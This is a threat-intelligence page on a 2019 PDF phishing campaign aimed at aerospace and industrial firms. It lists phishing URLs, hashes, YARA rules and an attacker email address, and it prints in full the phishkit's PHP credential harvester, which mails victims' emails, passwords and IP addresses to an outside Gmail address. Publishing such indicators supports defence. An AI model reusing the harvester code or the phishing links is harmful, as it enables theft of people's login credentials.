Skip to main content
Threat Radar animated logo
DashboardThreatsMapFeedsAPILifetime Access
reconnecting
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

Targeted phishing - PDF documents / phishkit

0
Low
Phishingmisp-galaxy:mitre-attack-pattern="spearphishing attachment - t1193"misp-galaxy:mitre-attack-pattern="spearphishing link - t1192"enisa:nefarious-activity-abuse="spear-phishing-attacks"type:osintosint:lifetime="perpetual"osint:certainty="50"tlp:whitetlp:cleartlp:green
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

AILast updated: 01/13/2026, 01:08:12 UTC

Technical Analysis

The threat described is a targeted phishing campaign utilizing PDF documents as the primary vector, often supported by phishkits—pre-packaged tools that facilitate the creation and deployment of phishing content. These PDFs may contain embedded links or malicious attachments designed to trick recipients into divulging credentials or executing malware. The attack patterns correspond to MITRE ATT&CK techniques T1193 (spearphishing attachment) and T1192 (spearphishing link), indicating a focus on highly targeted spearphishing rather than broad phishing campaigns. The campaign is identified through OSINT sources, with a moderate certainty level (50%), and no specific affected software versions or patches are noted, reflecting the generic nature of phishing threats. No known exploits in the wild have been reported, suggesting either limited spread or detection challenges. The threat leverages social engineering to bypass technical controls, relying on user interaction to open malicious PDFs or click embedded links. The lack of patches or CVEs is typical for phishing, as it exploits human factors rather than software vulnerabilities. The persistent and perpetual nature of phishing campaigns means organizations must maintain ongoing vigilance. The low severity rating in the source likely reflects the difficulty of quantifying impact, but the potential for credential compromise and subsequent lateral movement or data exfiltration remains significant. Indicators of compromise are not provided, emphasizing the need for behavioral and heuristic detection methods. Overall, this threat exemplifies the continued relevance of spearphishing as an initial attack vector in targeted cyber operations.

Potential Impact

For European organizations, the impact of targeted phishing via PDF documents can be substantial despite the low initial severity rating. Successful phishing can lead to credential theft, unauthorized access to sensitive systems, data breaches, and potential deployment of malware or ransomware. Sectors such as finance, government, healthcare, and critical infrastructure are particularly at risk due to the high value of their data and the potential for disruption. The use of PDFs as a delivery mechanism can bypass some email security filters, increasing the likelihood of user interaction. Compromised credentials can facilitate lateral movement within networks, enabling attackers to escalate privileges and access confidential information. Additionally, phishing campaigns can erode trust in communication channels and cause operational disruptions. Given the targeted nature, attackers may tailor content to specific organizations or individuals, increasing the chance of success. The impact on confidentiality is the most significant, with integrity and availability potentially affected if malware is deployed post-phishing. European organizations with less mature security awareness programs or insufficient email filtering may face higher risks. The threat also poses reputational risks and potential regulatory consequences under GDPR if personal data is compromised.

Mitigation Recommendations

Mitigation should focus on a combination of technical controls and user awareness. First, implement advanced email filtering solutions capable of detecting malicious PDFs and embedded links, including sandboxing attachments to analyze behavior before delivery. Employ URL rewriting and scanning to detect phishing links in emails. Conduct regular, targeted security awareness training emphasizing the risks of opening unsolicited PDF attachments and clicking unknown links, using simulated phishing exercises to reinforce learning. Enforce multi-factor authentication (MFA) across all critical systems to reduce the impact of credential theft. Maintain endpoint protection platforms with updated signatures and behavioral detection to identify malicious activity triggered by phishing payloads. Monitor network traffic for unusual patterns indicative of lateral movement or data exfiltration following phishing incidents. Establish incident response procedures specifically for phishing events, including rapid credential resets and forensic analysis. Leverage threat intelligence feeds to stay informed about emerging phishkits and phishing campaigns targeting the sector. Finally, apply strict email policies such as DMARC, DKIM, and SPF to reduce email spoofing risks.

Affected Countries

GermanyGermany
FranceFrance
United KingdomUnited Kingdom
ItalyItaly
SpainSpain
NetherlandsNetherlands
BelgiumBelgium
SwedenSweden
PolandPoland
AustriaAustria
Need more detailed analysis?Upgrade to Pro Console

Technical Details

Uuid
5cdd3938-7134-4908-9552-173cc0a8016e
Original Timestamp
1764973857

Indicators of Compromise

Yara

ValueDescriptionCopy
yararule PDF_LIFT { strings: $a = "Rect[ 195.05 428.59 411.79 489.67]" condition: all of them }
yararule PDF_JAT_AUTHOR { strings: $a = "<</Author(JAT)" condition: all of them }
Generic yara rule to find the common JAT author.

Email

ValueDescriptionCopy
emailjatboss6@gmail.com
Email used to send credentials (found in the sendmail.php file)

Url

ValueDescriptionCopy
urlhttps://lulufabllc.com/doc/cdnrg.com/index.php
Phishing links
urlhttps://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
Phishing links
urlhttps://www.arbutusroutes.com/document/standardaero.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/utc.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/gd.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/airbus.com/
Phishing links
urlhttp://office.online-drive.ml/push-doc/cproduct_brochure_fg.php
Older phishing link where the login page was mirror in Wed, 12 Sep 2018 06:29:39 GMT
urlhttps://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
Phishing links
urlhttps://arbutusroutes.com/ssl/akhurst.com/index.php
Phishing links

Target org

ValueDescriptionCopy
target-orgairbus.com
target-orgtenova.com
target-orgstandardaero.com
target-orggd.com
target-orgutc.com
target-orgcdnrg.com
target-orgakhurst.com

File

ValueDescriptionCopy
file28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
file56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
fileddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
file0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
filec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
filef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
fileNew-Updated-docs.zip
filesendmail.php

Size in-bytes

ValueDescriptionCopy
size-in-bytes293456
size-in-bytes283714
size-in-bytes252891
size-in-bytes447466
size-in-bytes156088
size-in-bytes485888
size-in-bytes3525231

Float

ValueDescriptionCopy
float7.9916395623958
float7.9880939695683
float7.9916147992407
float7.991595563552
float7.9280918012902
float7.9068746522467

Hash

ValueDescriptionCopy
hash9a58b7f8ba04c32c027126379456e444
hashb49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214
hash28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
hash1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f
hash164db8d1fe5f2ea9dd3ea826b2f0b808
hash890efaa698f4d43aad15c3dbacb6c01544fd3e27
hash56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
hash27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3
hash08b49fb9882bfc8f69beb594fa543c8a
hash201e85d6bc519ecc6dece75b2586e761a56db6a7
hashddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
hashb4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8
hash1baa024f9cfab48b92c297aa406c91b5
hash7d5a1dc90d535e3cc552d0db02841d28fb1ae773
hash0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
hash4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416
hashda877f4f7335264b03ac72fca5b305dc
hash435aa871cdd772072390d9baceaa8d832208d710
hashc052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
hash6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd
hashb830fd2997e1f124f34d77ff1fa9b89e
hashea43350c37e0c266c12d0fd53643cf94dd58c1f7
hashf2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
hash24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1
hashb7245bf657e792328aaacbc6f75d1555
hashbc32ff3213011db8278bfcd21b1dc432ded499d3
hash9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58

Malware sample

ValueDescriptionCopy
malware-sample28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444
malware-sample56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808
malware-sampleddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a
malware-sample0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5
malware-samplec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc
malware-samplef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e
malware-sampleNew-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555

Mime type

ValueDescriptionCopy
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.7
mime-typeCDFV2 Microsoft Outlook Message

Ssdeep

ValueDescriptionCopy
ssdeep6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ
ssdeep6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/
ssdeep6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1
ssdeep12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM
ssdeep3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7
ssdeep12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV

Text

ValueDescriptionCopy
textAdobe-Standard-Encoding
textMalicious
textSuspect
textJATBOSS
text<?php if(isset($_SERVER['HTTP_X_REAL_IP'])){ $ip = $_SERVER['HTTP_X_REAL_IP']; }else{ $ip=$_SERVER['REMOTE_ADDR']; } $message .= "|----------| E M A I L |--------------|\n"; $message .= "Online: ".$_POST['email']."\n"; $message .= "pass: ".$_POST['pwd']."\n"; $message .= "|--------------- I N F O | I P -------------------|\n"; $message .= "|Client IP: ".$ip."\n"; $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n"; $message .= "User Agent : ".$useragent."\n"; $message .= "|----------- HACKED BY JATBOSS --------------|\n"; $send = "jatboss6@gmail.com"; $subject = "$country | $ip"; { mail("$send", "$subject", $message); } ?>
textPHP
textMalicious
text1/56
text0/58
text2/59
text1/54
text10/61
text1/60
text0/58

Gender

ValueDescriptionCopy
genderPrefer not to say

Datetime

ValueDescriptionCopy
datetime2019-05-16T08:54:33
datetime2019-05-13T02:37:30
datetime2019-05-13T02:37:43
datetime2019-05-15T17:45:13
datetime2019-05-16T09:42:04
datetime2019-05-15T20:41:35
datetime2019-05-13T02:37:29

Link

ValueDescriptionCopy
linkhttps://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/
linkhttps://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/
linkhttps://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/
linkhttps://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/
linkhttps://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/
linkhttps://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/
linkhttps://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/

Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 1/13/2026, 1:08:12 AM

Last updated: 2/6/2026, 2:23:21 AM

Views: 101

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Related Threats

ThreatFox IOCs for 2026-02-05

Medium
MalwareFri Feb 06 2026

KRVTZ-NET IDS alerts for 2026-02-05

Low
UnknownThu Feb 05 2026

ThreatFox IOCs for 2026-02-04

Medium
MalwareThu Feb 05 2026

KRVTZ-NET IDS alerts for 2026-02-04

Low
UnknownWed Feb 04 2026

ThreatFox IOCs for 2026-02-03

Medium
MalwareWed Feb 04 2026

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Search on Google

Need more coverage?

Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats